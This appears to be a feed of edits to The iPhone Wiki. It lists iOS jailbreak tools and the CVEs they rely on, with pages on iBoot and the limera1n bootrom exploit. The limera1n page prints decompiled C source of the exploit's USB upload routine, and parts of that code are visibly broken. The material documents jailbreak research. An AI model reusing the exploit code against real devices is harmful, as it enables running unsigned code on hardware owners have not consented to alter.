== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.4)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* ivac entry use-after-free ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Limera1n_Exploit&amp;diff=112022</id>
		<title>Limera1n Exploit</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Limera1n_Exploit&amp;diff=112022"/>
		<updated>2021-04-09T12:57:40Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that the iPhone 4 is also vulnerable to SHAtter&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
The '''limera1n exploit''' is the [[bootrom]] and [[iBoot (Bootloader)|iBoot]] exploit used to run unsigned code (and thereby jailbreak) the [[N18AP|iPod touch (3rd generation)]], the [[N88AP|iPhone 3GS]] and all [[S5L8930|A4]]-based devices. First used in the [[limera1n]] tool by [[User:geohot|geohot]], it can perform a [[tethered jailbreak]] on the aforementioned devices. The jailbreak can then be turned into an [[untethered jailbreak]] with other exploits, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]]. &lt;br /&gt;
&lt;br /&gt;
limera1n was the most recent publicly disclosed bootrom exploit until the disclosure of the [[alloc8 Exploit]] in April 2017. The last device released vulnerable to limera1n is the [[N90BAP|iPhone 4 (iPhone3,2)]], and it remains the only publicly disclosed bootrom exploit, other than [[SHAtter]], for this device as well as all other variants of the [[iPhone 4]].&lt;br /&gt;
&lt;br /&gt;
==Source Code==&lt;br /&gt;
 signed int __cdecl upload_exploit() {&lt;br /&gt;
     int device_type;&lt;br /&gt;
     signed int payload_address;&lt;br /&gt;
     int free_address;&lt;br /&gt;
     int deviceerror;&lt;br /&gt;
     char *chunk_headers_ptr;&lt;br /&gt;
     unsigned int sent_counter;&lt;br /&gt;
     //int v6;&lt;br /&gt;
     signed int result; &lt;br /&gt;
     //signed int v8;&lt;br /&gt;
     int recv_error_code;&lt;br /&gt;
     signed int payload_address2;&lt;br /&gt;
     signed int padding_size;&lt;br /&gt;
     char payload;&lt;br /&gt;
     char chunk_headers;&lt;br /&gt;
     //int v14;&lt;br /&gt;
     //v14 = *MK_FP(__GS__, 20);&lt;br /&gt;
     device_type = *(_DWORD *)(device + 16);&lt;br /&gt;
 &lt;br /&gt;
     if ( device_type == 8930 ) {&lt;br /&gt;
         padding_size = 0x2A800;&lt;br /&gt;
         payload_address = 0x8402B001;&lt;br /&gt;
         free_address = 0x8403BF9C;&lt;br /&gt;
     } else {&lt;br /&gt;
         payload_address = 0x84023001;&lt;br /&gt;
         padding_size = 0x22800;&lt;br /&gt;
         // free_address = (((device_type == 8920) – 1) &amp;amp; 0xFFFFFFF4) – 0x7BFCC05C;&lt;br /&gt;
         if(device_type == 8920) free_address = 0x84033FA4;&lt;br /&gt;
            else free_address = 84033F98;&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     memset(&amp;amp;payload, 0, 0x800);&lt;br /&gt;
     memcpy(&amp;amp;payload, exploit, 0x230);&lt;br /&gt;
 &lt;br /&gt;
     if (libpois0n_debug) {&lt;br /&gt;
         //v8 = payload_address;&lt;br /&gt;
         fprintf(stderr, 1, &amp;quot;Resetting device counters\n&amp;quot;);&lt;br /&gt;
         //payload_address = v8;&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     payload_address2 = payload_address;&lt;br /&gt;
     deviceerror = irecv_reset_counters(client);&lt;br /&gt;
 &lt;br /&gt;
     if ( deviceerror ) {&lt;br /&gt;
         irecv_strerror(deviceerror);&lt;br /&gt;
         fprintf(stderr, 1, &amp;amp;aCannotFindS[12]);&lt;br /&gt;
         result = -1;&lt;br /&gt;
     } else {&lt;br /&gt;
         memset(&amp;amp;chunk_headers, 0xCC, 0x800);&lt;br /&gt;
         chunk_headers_ptr = &amp;amp;chunk_headers;&lt;br /&gt;
 &lt;br /&gt;
         do {&lt;br /&gt;
             *(_DWORD *)chunk_headers_ptr = 1029;       &lt;br /&gt;
             *((_DWORD *)chunk_headers_ptr + 1) = 257;&lt;br /&gt;
             *((_DWORD *)chunk_headers_ptr + 2) = payload_address2;  &lt;br /&gt;
             *((_DWORD *)chunk_headers_ptr + 3) = free_address;&lt;br /&gt;
             chunk_headers_ptr += 64;&lt;br /&gt;
         } while ((int *)chunk_headers_ptr != &amp;amp;v14);&lt;br /&gt;
 &lt;br /&gt;
         if (libpois0n_debug)&lt;br /&gt;
             fprintf(stderr, 1, &amp;quot;Sending chunk headers\n&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
         sent_counter = 0;&lt;br /&gt;
         irecv_control_transfer(client, 0x21, 1, 0, 0, &amp;amp;chunk_headers, 0x800);&lt;br /&gt;
         memset(&amp;amp;chunk_headers, 0xCC, 0x800);&lt;br /&gt;
 &lt;br /&gt;
         do {&lt;br /&gt;
             sent_counter += 0x800;&lt;br /&gt;
             irecv_control_transfer(client, 0x21, 1, 0, 0, &amp;amp;chunk_headers, 0x800);&lt;br /&gt;
         } while (sent_counter &amp;lt; padding_size);&lt;br /&gt;
 &lt;br /&gt;
         if (libpois0n_debug)&lt;br /&gt;
             fprintf(stderr, 1, &amp;quot;Sending exploit payload\n&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
         irecv_control_transfer(client, 0x21, 1, 0, 0, &amp;amp;payload, 0x800);&lt;br /&gt;
 &lt;br /&gt;
         if (libpois0n_debug)&lt;br /&gt;
             fprintf(stderr, 1, &amp;quot;Sending fake data\n&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
         memset(&amp;amp;chunk_headers, 0xBB, 0x800);&lt;br /&gt;
         irecv_control_transfer(client, 0xA1, 1, 0, 0, &amp;amp;chunk_headers, 0x800);&lt;br /&gt;
         irecv_control_transfer(client, 0x21, 1, 0, 0, &amp;amp;chunk_headers, 0x800);&lt;br /&gt;
 &lt;br /&gt;
         if (libpois0n_debug)&lt;br /&gt;
         fprintf(stderr, 1, &amp;quot;Executing exploit\n&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
         irecv_control_transfer(client, 0x21, 2, 0, 0, &amp;amp;chunk_headers, 0);&lt;br /&gt;
         irecv_reset(client);&lt;br /&gt;
         irecv_finish_transfer(client);&lt;br /&gt;
 &lt;br /&gt;
         if (libpois0n_debug) {&lt;br /&gt;
             fprintf(stderr, 1, &amp;quot;Exploit sent\n&amp;quot;);&lt;br /&gt;
             if (libpois0n_debug)&lt;br /&gt;
                 fprintf(stderr, 1, &amp;quot;Reconnecting to device\n&amp;quot;);&lt;br /&gt;
         }&lt;br /&gt;
 &lt;br /&gt;
         client = (void *)irecv_reconnect(client, 2);&lt;br /&gt;
 &lt;br /&gt;
         if (client) {&lt;br /&gt;
             result = 0;&lt;br /&gt;
         } else {&lt;br /&gt;
             if (libpois0n_debug) {&lt;br /&gt;
                 recv_error_code = irecv_strerror(0);&lt;br /&gt;
                 fprintf(stderr, 1, &amp;amp;aCannotFindS[12], recv_error_code);&lt;br /&gt;
             }&lt;br /&gt;
             fprintf(stderr, 1, &amp;quot;Unable to reconnect\n&amp;quot;);&lt;br /&gt;
             result = -1;&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     // compiler stack check&lt;br /&gt;
     //if (*MK_FP(__GS__, 20) != v14)&lt;br /&gt;
     //    __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);&lt;br /&gt;
 &lt;br /&gt;
     return result;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits]]&lt;br /&gt;
[[Category:Bootrom Exploits]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=IBoot&amp;diff=111688</id>
		<title>IBoot</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=IBoot&amp;diff=111688"/>
		<updated>2021-03-30T18:33:25Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added which chips LLB is present in&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
'''iBoot''' is the name of Apple’s bootloader. Its components are implemented in both hardware and software, and the term '''iBoot''' may refer to one of the following, which all have '''iBoot-''' in their version strings:&lt;br /&gt;
* [[Bootrom]] (SecureROM), the hardware implementation&lt;br /&gt;
* Any of the four variants of the software implementation:&lt;br /&gt;
:* [[iBEC]] (iBoot Epoch Change; called iBootStage2 in iOS 10 and later)&lt;br /&gt;
:* [[iBoot (Bootloader)|iBoot second-stage loader]] (often called simply ''iBoot'')&lt;br /&gt;
:* [[iBSS]] (iBoot Single Stage; called iBootStage1 in iOS 10 and later)&lt;br /&gt;
:* [[LLB]] (Low Level Bootloader or iBoot first-stage loader in A9 or earlier)&lt;br /&gt;
&lt;br /&gt;
The software implementations are built from the same source, but with different build parameters, as shown in the comparison table below.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=2 | Product !! colspan=7 | Modules !! rowspan=2 | Text bank !! rowspan=2 | Options&lt;br /&gt;
|-&lt;br /&gt;
! BOOT !! CONSOLE !! DFU !! DISPLAY !! FILESYSTEM !! FIRMWARE !! RECOVERY&lt;br /&gt;
|-&lt;br /&gt;
| iBoot || {{yes}} || {{no}} || {{no}} || {{yes}} || {{yes}} || {{no}}*** || {{yes}} || sdram || recovery, boot, filesystem, restore_strap&lt;br /&gt;
|-&lt;br /&gt;
| iBEC || {{yes}} || {{no}} || {{no}} || {{no}} || {{yes}} || {{no}}*** || {{yes}} || sdram || recovery, boot, filesystem, restore_boot&lt;br /&gt;
|-&lt;br /&gt;
| iBSS || {{yes}}* || {{no}}** || {{yes}} || {{no}} || {{no}} || {{no}}*** || {{yes}}* || sram || dfu, restore_strap, recovery*, boot*, restore_boot*, console**&lt;br /&gt;
|-&lt;br /&gt;
| LLB || {{no}} || {{no}}** || {{yes}} || {{no}} || {{no}} || {{yes}} || {{no}} || sram || dfu, restore_strap, console**&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt; Not included in special development builds&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;**&amp;lt;/nowiki&amp;gt; Included in special development builds&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;***&amp;lt;/nowiki&amp;gt; Included through the BOOT module, which consists of the submodules FIRMWARE, NVRAM, RAMDISK and SYSCFG.&lt;br /&gt;
&lt;br /&gt;
{{Disambig}}&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111629</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111629"/>
		<updated>2021-03-29T14:20:55Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* unc0ver (14.0 - 14.3) */ Add description of vulnerability since there is no exploit title&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
